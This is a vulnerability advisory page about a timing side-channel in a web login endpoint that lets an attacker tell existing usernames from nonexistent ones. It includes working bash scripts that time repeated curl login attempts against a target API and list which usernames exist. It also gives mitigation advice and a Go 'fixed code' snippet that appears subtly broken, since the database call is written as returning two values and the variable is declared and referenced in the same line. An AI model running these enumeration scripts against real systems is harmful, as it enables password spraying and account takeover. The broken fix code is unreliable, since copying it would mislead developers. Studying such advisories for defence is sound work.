Web Application, Timing Side-Channel Username Enumeration, CVE-N/A (medium)

Listen to this Post

The vulnerability works by exploiting a timing discrepancy in the login endpoint’s authentication logic. When a client sends a POST request to `/api/auth/token` with a username and password, the server first queries the database for that username. If the username does not exist, the server immediately returns an `ErrUnauthorized` response, taking approximately 0.0027 seconds. If the username exists, the server proceeds to call `bcrypt.CompareHashAndPassword` using the stored bcrypt hash and the provided password. This bcrypt operation is intentionally slow (cost factor typically 10 or more) and adds a significant delay, averaging 0.0616 seconds per request—even when the password is wrong. Because the server does not introduce any constant-time equalization (e.g., a dummy bcrypt call for non-existent users), an attacker can measure response times across many requests. By sending the same invalid password with a candidate username and comparing the average latency, the attacker can reliably distinguish existing usernames (slow) from non-existent ones (fast). The gap of ~0.0589 seconds is large enough to be detectable over a standard network connection without specialized equipment. This allows unauthenticated remote username enumeration, which then fuels further attacks like password spraying or credential stuffing.

dailycve form:

Platform: Web application
Version: Not specified
Vulnerability: Timing side-channel
Severity: Medium
date: 2026-04-13

Prediction: Patch within month

What Undercode Say:

Measure response times for username enumeration
for user in alice bob charlie; do
time curl -X POST https://target/api/auth/token \
-d "username=$user&password=fake" \
-w "%{time_total}\n" -o /dev/null -s
done
Automate detection with average over 10 requests
for user in $(cat usernames.txt); do
total=0
for i in {1..10}; do
total=$(echo "$total + $(curl -X POST https://target/api/auth/token \
-d "username=$user&password=invalid" \
-w "%{time_total}" -o /dev/null -s)" | bc)
done
avg=$(echo "scale=4; $total/10" | bc)
if (( $(echo "$avg > 0.03" | bc -l) )); then
echo "$user exists (avg ${avg}s)"
else
echo "$user not found"
fi
done

Exploit:

An attacker sends two sets of requests: one with a known valid username (e.g., from a previous breach) and another with a random non-existent username. Using the same wrong password for all requests, the attacker records response times. After 10–20 trials per username, the average for valid usernames will be ~0.06s, while invalid ones will be ~0.003s. The attacker then iterates through a dictionary of potential usernames, marking any with high average latency as valid. No authentication or rate-limiting bypass is needed.

Protection from this CVE:

  1. Replace the early return with a constant-time path: always perform bcrypt verification, even for non-existent usernames, using a dummy hash.
    // Fixed code
    user, err := db.Where("username = ?", username).First(&user)
    if err != nil {
    bcrypt.CompareHashAndPassword(dummyHash, []byte(password)) // dummy call
    return ErrUnauthorized
    }
    err = bcrypt.CompareHashAndPassword(user.PasswordHash, []byte(password))
    
  2. Add a random delay (e.g., 50–100ms) to all failed responses to mask timing differences.
  3. Implement rate limiting on the login endpoint to slow down enumeration attempts.
  4. Use a constant-time comparison library for all username existence checks.

Impact:

  • Type: Timing side-channel / username enumeration
  • Affected deployments: Any system using the vulnerable login flow (database lookup then conditional bcrypt)
  • Security impact: Unauthenticated attackers can enumerate valid usernames, reducing the complexity of credential stuffing and password spraying from O(NM) to O(N+M). This increases the success rate of targeted account takeovers.
  • Attack preconditions: Network access to the login endpoint; no prior credentials required.
  • Confidentiality impact: Low to moderate – reveals which accounts exist, which may be sensitive in privacy-focused or high-value environments.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top